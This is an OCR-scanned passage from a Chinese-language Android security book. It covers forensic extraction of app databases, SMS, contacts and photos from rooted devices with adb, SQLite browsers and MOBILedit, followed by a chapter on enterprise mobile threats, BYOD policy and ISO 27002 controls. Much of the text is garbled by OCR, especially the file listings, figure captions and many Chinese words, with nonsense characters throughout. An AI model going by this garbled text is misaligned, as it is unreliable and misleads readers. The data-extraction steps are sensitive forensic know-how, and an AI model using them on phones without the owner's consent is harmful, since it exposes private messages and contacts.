tompass ALUX cwx rE 23/03/1012 21:35:03 root root 
















mirmidog druxtwxrwx 13/09/2008 2L50:43 toot root 








wpsnle drUx EX Ev 13/03/2008 215043 shell — root ; 
busybox dtuxt-Xr-X M/08/2017 1308.30 toot — root | 
1ystemlog druxrwxrvx 2107/2012 17:05:29 root root | s 
dahok-cache AEWXrWX--X 1/01/2012 FLAGA system syster] F 1 
rado drwxrux--—- 13/01/2012 13:18 54 radio radio i 
property drux------ 19/00/2012 15.3254 toot root 
a app druxtwXk--x 10/08/2012 24644. system wstem| d 1 
l *amkeushi durra rommarnag ef Epl LIMB -rw-r--r-- 2001/2012 21:46:47 system system | D. | 
| com.hirmticonnandbup- Laph 33256 KB. -zu- r--r-- B/01/2012 211106 system system | | | 
j stencsonbusybex- Laph 479MB -rw-rť--t-- 15/08/2012 15:00:31 system system 1 
i vmdl54704 tmp ðb -fW------ 12/00/2012 1419 L3. system systern ! 
I com nmeihufau.andeodd ru- Lapk La MO  -tv-t--r-- 15/03/2012 1136-15. system system| 3 3 
| com.clabile DroidBei- Laph 57.1LNX8 -rus-r-r— 1105/2012 133110 system ryster | 
m" comro an grvburds- Laph 15485 MB -rw-t--t-- 12/01/2012 18.01.35. system. system | 
| com.campelian meconetecror- Laph 13556 kB. -rw-e--r-- 14/00/2012 24:14 7. system system | J 
| eu chimfre ginger rak- Lapk 105.34 KB -rw-t--r-- 15/00/2012 15.35.56 sytem syster | | 
: com.gaogle android. street Laph 4152391KB -rw-r--r-— 03/05/2017 18:22:02. system system i 
EI com.android vending- Lapk SIEMA  -ru-r-—r-- 07/08/2012 20144 58. tyster vystem 
| app-prreete druxrwx--x 13/03/2000 2150.43 system system i 
data (deu ry- 20/08/2012 21:36:44 system ivystem| | T 
local drexrwx--x 23/08/2012 11:45:25. shell all 
| i muc pem; Mosam ii " druxrw--t 12/09/2008 215043. system [mec] 
M -Lae —— demam — ———À— ———————— PU TUM TÓC UM AUN UEmBIMÁI 1.00.2048 J | 
$ seected t tem 


P 8. " 使 用 nS 工具 分 析 设 备 镜像 
8.6 访问 应 用 程序 数据 库 


正如 本 章 前 面 讨 论 的 ， 应 用 程序 可 以 在 SQLite 数据 库 中 存储 结构 化 的 数据 。 
任何 一 个 应 用 程序 都 可 以 在 这 样 格式 的 路 往 “/data/data/ < appname >/databases” 
目录 下 创建 DB (database， 数 据 库 ) 文件 。 里 然 可 以 先 将 Android 设备 root 处 理 ， 
然后 使 用 SQLite3 命令 行 工具 分 析 这 些 数 据 库 文件 。 但 是 ， 相 比 之 下 ,将 Android 
设备 制作 成 镜像 ， 然 后 使 用 分 析 人 员工 作 机 上 的 各 种 工具 (如 Yaffey 和 SQLite X 
览 器 ) 进行 分 析 ， 则 会 更 加 便捷 。 提 取 数 据 库 文件 并 使 用 SQLite 工具 浏览 数据 库 
文件 内 容 的 操作 步骤 如 下 : 

1) 获取 root 权限 ， 将 手机 上 的 ]data 分 区 制作 成 镜像 文件 (操作 过 程 参 见 上 
广内 容 )。 

2) 从 网 站 http: //sqlitebrowser. sourceforge. net/index. html E FRI KI que 


浏览 器 工具 。 
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3) 如 图 8.12 所 示 ， 使 用 Yaffey 工具 在 镜像 文件 中 浏览 一 个 应 用 程序 的 SQL 
数据 库 ， 然 后 将 该 应 用 程序 的 数据 库 文件 提取 到 工作 机 上 ， 或 者 通过 adb shell 执 
行 下 面 的 命令 将 数据 库 文 件 提取 到 工作 站 上 : 

adb pull/mnt/sdcard/ tmp/twitter. db 


waH 5 ugs a a 
| New Open Close Save hs Meert Epot | Expand A Colspse à — Rename D 


OC —À e o ‘MÁ 


. Path jdetsicon. twitter androidjdal ebases /tter,db 


Name 
^ocomodobe flashplaye: 


Permitons Alms Date Modified 


drwxr-*--x 11/5/2008 2:50:57 10095 10095 


—— 


» 
> 
$ 
$ 
p 


| uw ow oy 


> com oer engineenngmode VenfiestionAudio 


com,go«gle android. street 

camandtoid providers ubvcrdbyedfeeits 
omandivid bluetooth 
com,dell andrid providen setnings 

Lom hette 

comguakomm permessentocapi 

com orm-erigineerngmode Bluetooth 
cam aem eagmeenrigmode vecunty 
«oam.evernotbe 

tom.qocgle.android.sy ncadapters.cónta cts 
cam. oem engineenngmode.itetwon verting 
«em dell huseymy 

tom. twittecandrmd 

4 dibbaes 


— — — 


tib 


«om andiold calendar 


^" com orm lag 
* £om.oem engirieennamod aliproommty 


> com aem engineerngmode-«eüficationsimeard 


p 


nn orm inputmethad.latin 
com.andtoid.providen med 
eorm andiowl hmmlyyeyer 


Selected lem —— 


图 8. 12 


Arwxr-x--x 
drwxr-x--x 
drwxt-x--x 
jrwxr-x--x 
drwx«r-x--* 
drwxt-x--x 
jrwxi-x--x 
Arwxr-x--x 
drw«r-x—x 
drwxr-x--x 
drtwxr-Xk--* 
dIWxr-X--x 
drw«r-X--x 
drwx rwx --x 


— ]3$90 KB -ruw-rw--- 


dIWxi-Xr-k 
Arwxr-x--x 
druxt-x--x 
drvxr-x--x 
dIWXI-X--X 
drwxtf-x--x 
drwxt-x--x 
drwxr-x--k 
dEwxr-x--x 


——  À—(Q'Ó: 


13/99/2908 2L546:57 (2008 


13/04:2000 1150:56 systern rviterm 


11779 903 LESLI 10007 


14007 


13/08/2008 2L5L38. system. system 


13/04/2001 205456. 10046 
13/03/2008 215124 10573 
11:25. 2023 2154-58. 10005 


19096 
IN 73 
105 


D/94798 2L513T xyttem system 


22/201 1T EL 10004 
03/05/2012 1$2E D. 10036 
13/08/2008 215953. rədio 
13/04/2008 215108. 10063 
23/08/20 L2 18:2L10. 10203 
0305/2012 1121:19. 10003 
WISNER 15:21:19 19803 


i9004 
136 
radio 
toos 
10003 
iva 
103 


13/01; 2008 21:50:52 system system 


13092006 2650:52 10002 
13002008 205052 10001 
13/04/2008 21:50:51. 10000 
1303/2008 2L51-34. 10086 
ENOL 2008 205118. radio 
11:09/2008 25024 10071 
11/05/2003 215154 19020 
1201/2008 2L5L20. 196074 





应 用 程序 Twitter 的 数据 库 位 置 


10007 
19001 
10000 
10016 
rado 
i0078 
10020 
1004 





4) 如 图 8.13 所 示 ， 在 SQLite 23038 PEDU Vi, ar HITI twitter. db 数据 库 文件 。 


ano S € ———————M— 


— 


(Fes Edit oVew Hep 


Dulossussrm"tE E 





- ———— — 


Schema 


Eog x” 


mE 
ET ln e 


一 


Tem 


CREATE TABLE sodroid. metscta (ocala TEXT) 
CREATE TABLE users (. id INTEGER PRIMARY «Ev,user i6 INT UNIQUE NOT NU... | 
CREATE TABLE photos ( d INTEGER PRIMARY KEY,url TEXT UNIQUE mage SLOB) 
CREATE TABLE user values ( jd INTEGER PRIMARY KEY,name TEXT, value TEXT) | 
CREATE TABLE user. groups (id INTEGER FRIMARY KEYtype INztagINTown... | — | 
CREATE TABLE cursors ( d INTEGER PRIMARY KEY.kind INT, type INT/owner id... 
CREATE TABLE statusas (jd INTEGER PRIMARY KEY, status id INT UNIQUE No... 
CREATE TABLE status groups ( id INTEGER PRIMARY KEY,type INT, owner id I... 
CREATE TABLE messages (id INTEGER PRIMARY KEY.type INT, még id INT UNI... 
CREATE TABLE search. results (. id INTEGER PRIMARY KEY content TEXT.rest... | 
CREATE TABLE search. queries ( id INTEGER PRIMARY KEY type INT,name TEX... | 
CREATE TABLE lsts (id INTEGER. PRIMARY KEY, owner. id INT, typa INT, ist id T... | 


CREATE INDEX user. groups. id ON user. groups (type,owner id.user. id) 
CREATE INDEX status. groups id ON status. groups (type owner id,hsg,g st... | 
CREATE INDEX user. cursors. index ON cursors (Kind, type;owner i) 

CREATE INDEX se arch, queries. index ON search. queries (type, name query) 
CREATE INDEX search results index ON search results (Esg;status. id) 





图 8.13 dE SQLite 数据 库 浏 览 器 中 分 析 Twitter 数据 库 文件 
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8.7 从 Android 设备 上 提取 数据 


前 面 章节 ， 已 经 介绍 了 如 何 对 Android 设备 进行 root 人 处理， 以 及 获取 设备 上 存 
储 的 有 用 信息 。 rd eh 点 地 提取 数据 的 方法 获取 设备 上 存储 的 有 用 数 
据 。 但 是 在 效率 上 难免 有 些 不 尽 如 人 意 。 因 此 ， 可 以 借助 一 些 工具 提高 数据 获取 的 
效率 。 例 如 ， 使 用 MOBILedit 软件 。MOBILedit 软件 用 于 提取 经 过 root 处 理 的 设备 
上 的 各 种 数据 ， 包 括 联系 人 信息 、SMS 信息 、 应 用 程序 的 数据 库 文件 ， 等 等 。 使 
————— 步骤 如 下 : 

) 确定 设备 已 经 过 root 处 理 ， 相 关 操 作 可 查看 本 草 前 面 几 节 的 介绍 。 

下 载 并 安装 MOBILedit NRE, EA. 14 所 示 。 


Folow iwirucions n this wizard cxefülly, Esch detsi zin be very Important. Tf you need 
any acvice, vit the yini nnl with video tutoriais, 


Yat would you lie to connect? 


p 9. Phone 
i» Internet 5torece 
g Data fie 


514 card reader 





图 8.14 MOBILedit 应 用 启动 界面 
3) 在 MOBILedit 应 用 程序 中 输入 设备 的 全 地 址 ， 如 图 8. 15 所 示 。 





` L. Connect phone to ne same WiFi netnork at your PC 
:overopattcrecir ton oe chi 
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图 8.15 使 用 MOBILedit 连接 Android mm 
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4) 该 应 用 软件 同 移动 设备 连接 上 后 ， 即 可 下 载 / 查 看 各 种 信息 ， 包 括 通话 记 
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3x. SMS 信息 、 所 有 的 照片 等 ， 如 图 8.16 所 示 。 





» Pn c : Mec 
Prste Laer ipte WO esee eco rE esl" 
Ai Gm | j 
: ac LEID TII 
à -— 
Mast i arty "t ag van ct 
iJe 
Om = -— —— f "E 
Qv irae mm ILL PIU 


MM 


图 8. 16 ”提取 联系 人 资料 、 短 信 / 彩 信 、 电 子 邮件 和 照片 


5) 通过 MOBILedit 应 用 软件 还 可 以 下 载 设 备 上 的 其 他 数据 〈 见 图 8. 17) ix 
者 可 以 使 用 前 面 几 节 介 绍 的 技术 ， 对 这 些 下 载 的 数据 做 进一步 的 分 析 。 
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图 8.17 从 移动 设备 的 文件 系统 中 提取 数据 
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8.8 小 结 


本 章 介 绍 了 Android 系统 使 用 的 各 种 类 型 的 文件 系统 ， 介 绍 了 安全 专业 人 员 在 
分 析 设 备 和 应 用 程序 时 所 感 兴 趣 的 有 关 分 区 和 挂 载 点 的 相关 知识 ， 应 用 程序 存储 持 
久 化 数据 (如 数据 库 、 设 置 参 数 、 文 件 等 ) 的 各 种 不 同方 式 ， 以 及 获取 和 分 析 这 
些 信息 的 各 种 方法 。 同 时 ， 本 章 还 介绍 了 对 Android 设备 进行 root 处 理 的 操作 步骤 
(不 同 的 Android 发 布 版 本 root 处 理 步骤 有 所 差异 )， 以 及 使 用 第 三 方 应 用 软件 从 
Android 设备 中 提取 数据 的 方法 。 
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本 章 主要 关注 企业 环境 Android 系统 的 安全 问题 ， 以 及 部 署 Android 应 用 程序 
过 程 中 存在 的 安全 问题 。 首 先 从 一 般 性 的 角度 上 分 析 移 动 设备 的 安全 因素 ， 然 后 以 
具体 的 Android 设备 为 例 ， 进 行 有 针对 性 的 分 析 。 随 后 ， 介 绍 监管 、 合 规 / 审 查 事 
项 ， 以 及 终 闯 用 户 培 训 方面 的 问题 。 最 后 ， 讨 论 有 关 增 强 Android. 系统 安全 的 问 
题 ， 以 及 如 何 开发 安全 的 Android 应 用 程序 的 问题 。 


9.1 企业 的 Android 系统 


从 企业 的 角度 出 发 ， 企 业 环 境 涉 及 Android 系统 的 安全 问题 ， 主 要 可 以 涵盖 以 
下 三 个 方面 : Android 设备 的 部 署 、Android 应 用 程序 的 开发 ， 以 及 允许 Android 应 
用 程序 在 企业 环境 下 使 用 所 带 来 的 隐患 。 

部 署 Android 设备 和 应 用 程序 只 是 一 项 简单 的 信息 技术 (IT) 功能 运用 ， 而 开 
发 安全 的 Android 应 用 程序 则 属于 研发 /设计 团队 或 全 开 发 团队 的 工作 范畴 。 


9.1.1 企业 Android 系统 的 安全 问题 


正如 第 1 章 所 讨论 的 ， 当 今 的 移动 设备 (包括 Android FHL) 在 硬件 和 软件 功 
能 上 正在 以 极 快 的 速度 发 展 。 

本 书 对 这 些 威 胁 的 评估 ， 以 及 采用 的 安全 控制 措施 ， 已 经 无 法 跟 上 移动 设备 上 
各 种 功能 的 发 展 了 。 由 于 这 些 设备 上 的 功能 日 渐 丰 富 ， 越 来 越 多 的 威胁 不 断 地 向 移 
动 设 备 领域 草 延 。 因 此 ， 需 要 对 这 些 设 备 采 取 更 多 的 安全 防护 措施 。 在 企业 中 部 署 
这 些 设备 或 应 用 程序 之 前 ， 最 重要 的 是 全 面 细 致 地 分 析 这 些 移动 设备 可 能 面临 的 威 
胁 ， 以 及 针对 移动 设备 (用 户 ) 上 使 用 /访问 的 企业 资源 的 威胁 。 此 类 分 析 可 以 通 
过 使 用 一 套 威胁 模型 来 完成 。 在 威胁 建 模 中 ， 可 以 从 资产 保护 、 资 产 威胁 和 产生 的 
漏洞 三 个 方面 进行 分 析 。 最 终 ， 给 出 一 套 适 合 的 安全 控制 措施 ， 减 少 这 些 威胁 和 
汤 洞 。 

正如 在 第 4 章 简单 介绍 的 那样 ， 和 其 他 任何 一 种 操作 系统 类 似 ，Android 系统 同 
样 面临 着 各 种 传统 的 安全 问题 。 本 章 将 对 这 些 问题 进行 展开 讨论 ， 其 中 包括 一 些 在 之 
前 讨论 中 有 意 忽略 、 留 待 后面 章节 讨论 的 问题 。 下 面 列 出 了 几 个 Android 移动 设备 可 
能 存在 的 安全 问题 《有 关 这 部 分 内 容 的 参考 文档 地 址 为 http ://csrc. nist. gov/ publica- 
tions/ drafts/800- 124r1/draft sp800- 124- rev1. pdf) : 

1) 缺少 对 设备 的 实际 管控 。 
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2) 使 用 不 可 靠 的 移动 设备 。 

3) 使 用 不 可 靠 的 连接 和 网 络 。 

4) 使 用 不 可 靠 的 应 用 软件 。 

5) 同 其 他 未 知 系统 建立 连接 和 交互 。 

6) 访问 不 可 靠 的 内 容 。 

7) 使 用 位 置 服务 。 

8) 缺少 对 应 用 程序 和 操作 系统 漏洞 补丁 的 管理 。 

1. 缺少 对 设备 的 实际 管控 

移动 终端 设备 往往 由 终端 用 户 随 身 管 理 ， 而 不 是 由 系统 管理 员 或 安全 专业 人 员 
管理 。 事 实 上 ， 用 户 始 终 随 号 携带 移动 终端 设备 增加 了 企业 资源 遭受 危害 的 风险 。 
从 用 户 使 用 移动 设备 时 被 人 肩 舌 到 移动 设备 丢失 或 被 盗 ， 众 多 针对 移动 设备 上 数据 
言 奶 的 威胁 源 自 于 缺少 对 这 些 设备 实施 有 效 的 管控 。 移 动 设备 很 有 可 能 丢失 、 被 资 
或 暂时 脱离 用 户 的 触及 范围 和 视线 范围 。 从 企业 安全 的 角度 上 来 看 ， 应 当 对 可 能 存 
在 的 企业 信息 资源 的 危害 做 出 这 样 的 假设 ， 即 一 旦 这 些 设备 丢失 或 被 窃 ， 它 们 可 能 
落 在 恶意 用 户 的 手中 ， 从 而 造成 设备 曾经 访问 的 企业 资源 或 可 能 存储 的 企业 信息 资 
源 面 临 泄露 的 风险 。 因 此 ， 必 须 针 对 这 样 的 假设 ， 设 计 有 效 的 安全 控制 措施 ， 阻 止 
移动 设备 上 敏感 数据 的 泄露 。 

考虑 到 最 糟糕 的 情况 发 生 ， 即 丢失 或 被 窃 的 设备 落 信 亚 意 用 户 的 手中 。 在 这 种 
情况 下 ， 避 免 设 备 上 信息 遭受 进一步 危害 的 最 好 方式 ， 就 是 给 移动 设备 加 密 (如 
果 重 要 数据 允许 在 移动 设备 上 存储 )， 或 从 一 开始 就 禁止 企业 员工 使 用 个 人 移动 设 
备 访问 重要 的 企业 资源 信息 (对 于 Android 智能 手机 来 说 ， 这 点 可 能 很 难 实 现 )。 
防止 他 人 通过 肩 突 帘 视 用 户 屏幕 内 容 ， 最 明知 的 做 法 就 是 使 用 隐私 屏幕 (确实 已 
经 有 了 这 种 针对 手机 屏幕 内 容 保 护 的 设计 了 )。 此 外 ， 如 果 确 实 需 要 访问 企业 资 
源 ， 在 使 用 这 些 设备 时 ， 应 当 开 启 锁 屏 设 置 (需要 密码 /PIN 码 ， 才 能 开启 屏幕 )。 
当然 ， 最 好 的 安全 做 法 是 在 所 有 的 应 用 程序 上 设置 程序 启动 密码 ， 也 就 是 当 用 户 在 
每 次 使 用 应 用 程序 时 ， 都 要 输入 密码 验证 用 户 身份 。 不 过 ， 这 样 做 非常 麻烦 ， 以 至 
于 用 户 很 可 能 坚持 不 下 来 (想象 一 下 ， 在 Android 设备 上 ， 每 次 用 户 使 用 Facebook 
应 用 程序 时 都 需要 先进 行 身 份 验证 操作 ;然后 才能 正常 登录 Facebook 软件 ) 。 

2. 使 用 不 可 靠 的 用 户 设 备 

很 多 企业 在 用 户 设备 管理 方面 都 采用 BYOD ( 自 带 设备 ) 管理 模式 。 实 际 上 ， 
这 也 就 意味 着 用 户 会 把 他 们 自己 的 移动 设备 (自己 买 的 ) 带 人 到 企业 ， 并 用 其 访 
问 企 业 资 源 。 这 便 会 导致 一 定 风险 的 出 现 ， 因 为 这 些 设备 对 于 企业 安全 来 说 是 不 可 
靠 的 ， 且 没有 经 过 企业 的 安全 审核 ， 唯 一 只 能 靠 用 户 自 己 ， 出 于 对 企业 资源 信息 安 
全 负责 的 考量 ， 对 自己 的 移动 设备 进行 安全 性 检查 。 因 此 ， 对 于 企业 来 说 ， 这 种 认 
为 所 有 设备 实际 上 都 不 可 靠 的 假设 并 不 是 毫 无 根据 的 。 

企业 必须 针对 移动 终端 设备 ， 强 制 执 行 各 项 安全 制度 。 不 论 这 些 设备 是 属于 用 
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户 目 己 的 ， 还 是 企业 配 发 的 。 而 且 ， 还 需要 对 这 些 设备 和 设备 上 面 的 应 用 程序 进行 
监控 。 此 外 ， 其 他 的 安全 方案 还 包括 : 提供 并 要 求 用 户 使 用 企业 定制 的 设备 (这 
些 设备 搭载 了 针对 安全 问题 进行 强化 的 操作 系统 ， 预 先 审核 过 的 应 用 程序 和 各 种 安 
全 使 用 规则 ) ; 允许 用 户 携带 自己 的 移动 终端 设备 ， 但 只 能 使 用 企业 提供 的 防护 完 
善 的 沙 箱 软件 访问 企业 敏感 信息 资源 。 

3. 连接 到 未 批准 和 不 可 靠 的 网 络 

移动 设备 有 多 种 连接 方式 : 蜂窝 数据 连接 、 无 线 和 蓝牙 连接 ， 以 及 近 场 通信 
(NFC) 等 。 企 业 应 当 假 定 用 户 会 使 用 任意 连接 方式 ， 甚 至 会 使 用 所 有 的 连接 方式 。 
这 些 可 选 的 连接 方式 ， 可 以 导致 各 种 类 型 的 攻击 出 现 ,包括 : 网 络 嗅 探 攻击 、 中 间 
大 攻击 和 物 听 等 攻击 类 型 。 以 这 类 攻击 为 例 ， 当 终端 用 户 将 设备 连接 到 任意 一 个 可 
AIRT (FEF W Wi- Fi 网络 时 ， 攻击 者 即 可 对 用 户 之 间 的 通信 实施 客 听 
(如 果 没 有 对 这 些 通 信 采 用 防护 措施 ) 。 

确保 开始 通信 之 前 ， 先 对 通信 双方 的 身份 进行 验证 ， 然 后 再 使 用 加 密 技 术 ， 能 
够 有 效 地 降低 这 类 攻击 带 来 的 信息 泄露 风险 。 

4. 使 用 不 可 靠 的 应 用 程序 

实际 上 ， 这 类 问题 与 台式 机 /笔记 本 电脑 上 出 现 的 问题 一 样 。 在 这 些 终端 设备 
上 ， 用 户 可 以 自由 地 安装 任意 他 们 选择 下 载 的 应 用 程序 。 即 便 员工 的 移动 设备 是 企 
业 配 发 定制 的 ， 设 备 的 所 有 权 归 企业 所 有 ， 并 且 这 些 设备 经 过 企业 的 审核 批准 ， 但 
是 ， 用 户 在 使 用 这 些 设备 时 ， 仍 然 可 以 自由 地 安装 他 们 自己 下 载 的 应 用 程序 CHR 
非 企业 安全 规章 明令 禁止 这 种 做 法 )。 而 且 ， 对 于 Android 系统 ， 用 户 可 以 从 几 十 
个 应 用 市 场 下 载 应 用 程序 ， 甚 至 直接 从 互联 网 上 下 载 应 用 。 

有 几 个 方案 可 以 用 来 减少 这 种 威胁 。 企 业 可 以 通过 制定 安全 规章 或 合理 的 使 用 
规章 制度 ,明令 禁止 使 用 第 三 方 应 用 程序 。 如 果 用 户 想 要 使 用 他 和 们 的 Android 设备 
访问 企业 资源 ， 可 以 给 他 们 提供 一 个 允许 安装 和 使 用 的 应 用 程序 白 名 单 。 不 过 ， 尽 
管 这 样 可 以 阻止 他 们 安装 特定 的 应 用 程序 ( 比如 Facebook) ， 但 是 他 们 仍然 可 以 通 
过 其 他 的 方式 使 用 这 些 特定 的 应 用 程序 (例如 ,使 用 浏览 器 通过 网 页 登录 Face- 
book 等 社交 平台 )。 因 此 , 减少 这 种 威胁 最 有 效 的 做 法 ， 就 是 在 执行 安全 规章 的 同 
时 ， 加 强 对 企业 终端 用 户 的 教育 。 此 外 ， 企 业 还 可 以 采用 男 一 套 对 策 ， 即 对 企业 用 
户 的 移动 终端 设备 在 企业 环境 下 进行 监控 。 

S. 连接 不 可 靠 的 系统 

移动 设备 可 以 向 /从 多 个 设备 和 数据 源 同步 数据 。 这 一 功能 可 用 在 电子 邮件 、 
日 程 安排 、 图 片 、 音 乐 和 电影 等 内 容 的 同步 。 这 些 进行 同步 的 数据 源 / 目 标 设备 可 
以 是 企业 的 台式 /笔记 本 电脑 、 个 人 台式 /笔记 本 电脑 、 网 站 ， 以 及 目前 越 来 越 热 的 
各 种 基于 云 平 台 的 服务 。 因 此 ， 可 以 假设 任何 存放 在 设备 上 数据 ， 都 可 能 面临 着 
风险 。 

如 果 企 业 员 工 使 用 的 移动 设备 的 所 有 权 属 于 企业 ， 强 制 执行 这 些 安全 制度 能 够 
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有 效 地 阻止 设备 上 的 信息 备份 或 同步 到 未 经 授权 的 数据 源 。 如 果 移 动 设 备 是 企业 员 
工 自己 的 ， 那么 通过 教育 提高 用 户 信 息 安 全 意识 和 对 设备 实施 监控 (以 及 强制 员 
工 通 过 沙 箱 应 用 程序 访问 企业 资源 )， 将 成 为 企业 能 够 采用 的 企业 信息 安全 防护 
举措 。 

6. 访问 不 可 靠 的 信息 内 容 

使 用 移动 设备 时 ， 用 户 可 能 会 遇 到 大 量 不 可 靠 的 信息 内 容 ( 例 如 ， 附 件 、 下 
载 的 文件 和 QR (快速 反应 ) 码 等 )。 其 中 ， 多 数 不 可 靠 的 信息 内 容 源 目 有 问题 的 
或 未 知 的 数据 源 ， 从 而 给 用 户 和 企业 的 数据 带 来 潜在 的 风险 。 以 QR 码 为 例 ， 在 这 
些 QR 码 包含 的 信息 中 ， 可 能 隐藏 有 恶意 的 URL 地 址 或 下 载 项 。 但 是 ， 用 户 可 能 
并 没有 意识 到 这 些 问 题 ， 不 加 防备 地 使 用 移动 设备 读 取 这 些 QR 人 码 ， 从 而 成 为 恶意 
攻击 的 受害 者 。 

安装 安全 防护 软件 (杀毒 软件 ) 可 以 在 一 定 程度 上 降低 安全 风险 。 但 是 ， 对 
于 那些 源 自 QR 码 的 攻击 ， 另 一 种 有 效 的 防护 方式 就 是 禁用 照相 机 功能 。 不 过 ， 树 
立 良好 的 安全 意识 ， 则 是 应 对 任何 安全 威胁 最 为 有 效 的 解决 办 法 。 

7. 使 用 GPS. (位 置 相关 的 服务 ) 

如 今 ， 越 来 越 多 的 移动 设备 可 以 被 作为 导航 设备 ， 查 找 各 种 基于 位 置 的 “ 信 
息 ”。 很 多 应 用 程序 需要 依靠 移动 设备 上 的 GPS 功能 提供 的 位 置 数 据 。 从 Facebook 
到 yelp， 这 些 应 用 程序 使 用 用 户 的 位 置 数 据 ， 改 进 应 用 程序 的 用 户 体 验 。 但 是 ;这 
也 给 用 户 的 信息 安全 带 来 一 定 的 安全 风险 。 除 了 在 用 户 隐 私 方 面 埋 下 隐患 外 ， 还 有 
一 个 问题 ， 就 是 使 攻击 者 可 以 使 用 用 户 的 位 置信 息 ， 发 起 有 和 针对 性 的 攻击 ， 或 是 根 
据 用 户 的 位 置信 息 猜 测 用 户 的 行为 活动 。 

禁用 GPS 功能 ， 是 降低 这 种 安全 风险 的 一 种 方式 但 是 ， 这 并 不 适合 BYOD 
模式 。 男 一 种 行 之 有 效 的 办 法 ， 就 是 通过 宣传 教育 ， 使 用 户 意识 到 使 用 位 置 数 据 可 
能 存在 的 信息 安全 隐患 。 同 时 ,还 可 以 通过 安全 制度 的 有 效 执行 和 落实 ， 阻 止 用 户 
设备 上 的 应 用 程序 (例如 ， 社 交 媒 体 应 用 程序 ) 访问 位 置信 息 。 

8. 缺少 修补 应 用 程序 和 操作 系统 漏洞 的 管理 

在 采用 BYOD 模式 的 企业 环境 下 ， 这 是 一 个 很 严重 的 问题 。 携 带 个 人 移动 设 
备 的 企业 员工 ， 很 可 能 不 会 修补 或 更 新 已 经 发 布 的 针对 他 们 设备 的 操作 系统 /应 用 
程序 的 安全 补丁 ， 从 而 导致 企业 资源 暴露 在 安全 风险 之 下 。 试 想 一 下 ， 在 你 的 周围 
可 能 存在 着 各 种 版 本 的 Android 系统 (从 2. 2. 21 版 本 到 4. x 系列 版 本 ) ， 并 且 每 一 
个 版 本 的 Android 系统 都 可 能 存在 各 种 安全 问题 。 用 户 很 可 能 并 没有 升级 他 们 的 
Android 系统 版 本 或 及 时 安装 安全 漏洞 修复 补丁 。 而 且 ， 很 多 用 户 也 不 会 及 时 地 更 
新 设备 上 的 应 用 程序 版 本 。 

监控 企业 员工 的 移动 设备 ， 试 图 确定 这 些 设备 的 操作 系统 /应 用 程序 的 版 本 信 
息 ， 就 可 以 根据 这 些 信 息 标识 出 存在 于 企业 环境 下 的 不 安全 的 操作 系统 /应 用 程序 。 
然后 ， 有 针对 性 地 要 求 这 些 存在 风险 的 设备 用 户 做 出 选择 : 要 么 升级 其 设备 系统 / 
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应 用 程序 版 本 ; 要么 取消 其 访问 企业 资源 的 权限 。 
9.1.2 终端 用 户 的 安全 意识 


任何 确保 移动 设备 信息 安全 或 通过 移动 设备 访问 企业 资源 的 安全 策略 ， 都 离 不 
开 对 移动 终端 用 户 的 安全 培训 。 通 过 培训 ,使 用 户 了 解 到 各 种 安全 风险 (如 上 所 
列 )， 认 识 到 安全 管控 制度 至 关 重 要 的 原因 。 自 觉 遵 守 安全 管控 制度 ， 应 当 作 为 用 
户 需 要 接受 的 在 企业 环境 下 移动 设备 使 用 政策 的 一 部 分 ， 并 且 要 求 用 户 每 年 至 少 需 
要 复习 一 次 这 些 政策 。 而 且 ， 每 年 的 安全 意识 培训 和 培训 后 的 测试 ， 应 当 把 用 户 心 
中 一 些 好 的 安全 做 法 吸收 进来 。 此 外 ， 还 应 当 在 安全 意识 培训 中 ， 补 充 一 些 对 用 户 
使 用 移动 设备 时 特定 操作 行为 的 告 诚 ， 从 而 防止 他 们 使 用 未 经 企业 批准 的 操作 行为 
《例如 ， 使 用 移动 设备 访问 有 害 的 网 站 ， 下 载 亚 意 代码 等 ) 。 


9.1.3 AIW REFN 


企业 需要 向 客户 .审查 人 员 和 其 他 的 利益 相关 者 展示 企业 的 安全 性 。 如 今 ， 移 
动 设备 逐渐 成 为 企业 “计算 基础 设施 ”中 不 可 缺少 的 一 部 分 。 因 了 此， 自然 成 为 审 
查 人 员 深 入 检查 的 对 象 之 一 ; 虽然 当前 的 安全 认证 (标准) 还 无 法 跟 上 移动 设备 
威胁 方式 的 发 展 速度 ， 但 是 对 于 移动 设备 (以 及 针对 移动 设备 开发 的 应 用 程序 ) 
来 说 ， 基 本 的 安全 防护 措施 还 是 必 不 可 少 的。 否则 ， 如 果 你 的 移动 设备 /基础 设施 
的 安全 性 没有 得 到 增强 ， 因 而 在 安全 审查 时 发 现 安全 问题 ， 那 么 在 一 些 情况 下 
(取决 于 企业 的 监管 条 例 / 准 则 ) ， 你 将 会 受到 处 罚 。 

ISO 27002 是 ISO/IEC HLAO 发布 的 一 套 被 广泛 使 用 的 安全 体系 标准 。 它 列举 
T 39 个 管控 对 象 和 130 多 个 安全 控制 措施 ， 用 于 确保 企业 环境 的 安全 。 其 中 很 多 
控制 措施 为 保护 移动 设备 、 数 据 ， 以 及 移动 设备 上 的 应 用 程序 的 安全 性 提供 直接 或 
间接 地 指导 。 控 制 措施 9. 2. 5 (Control 9.2.5) 条 款 用 于 处 理 实体 安全 问题 ， 控 制 
措施 10. 8. 1 条 款 用 于 处 理 信息 交换 ， 以 及 控制 措施 11.7.1 条 款 专 门 用 于 制定 和 颁 
布 各 种 安全 制度 和 措施 ， 解 决 来 自 移动 设备 的 各 种 威胁 。 

除了 上 面 提 到 的 这 些 控制 措施 外 ， 还 可 以 在 移动 设备 上 使 用 一 些 其 他 的 控制 措 
施 。 例 如 ， 定 期 地 打 补 丁 、 安 全 扫描 、 安 全 强化 和 使 用 加 密 等 措施 。 在 “信息 系 
统 的 购买 、 开 发 和 维护 ”方面 ， 制 定 控制 措施 的 宗旨 是 ， 在 开发 信息 系统 和 应 用 


O ISO/IEC 机 构 ， 即 ISO/IEC 联合 信息 技术 委员 会 (ISO/IEC JOINT TECHNICAL COMMITTEE FOR IN- 
FORMATION TECHNOLOGY), ， 是 国际 标准 化 组 织 〈ISO) 和 国际 电工 委员 会 〈 下 C) 联合 组 建 的 第 
一 个 标准 化 技术 委员 会 ， 其 编号 为 JTC1。 它 在 IS0 和 IEC 共同 领导 下 ， 承 担 信 息 技术 领域 国际 标准 
制定 工作 ， 其 重要 性 和 影响 力 非 同 一 般 。 国 际 标 准 化 组 织 和 国际 电工 委员 会 这 两 大 国际 顶尖 的 标准 
化 机 构 ; 长 期 以 来 ， 形 成 了 既 有 明确 的 业务 分 工 ， 同 时 又 相互 协作 的 良性 互动 关系 ， 具 体 地 说 ，IEC 
负责 电工 技术 领域 的 国际 标准 制定 工作 ， 其 他 领域 则 由 ISO 负责 。 一 一 译 者 注 
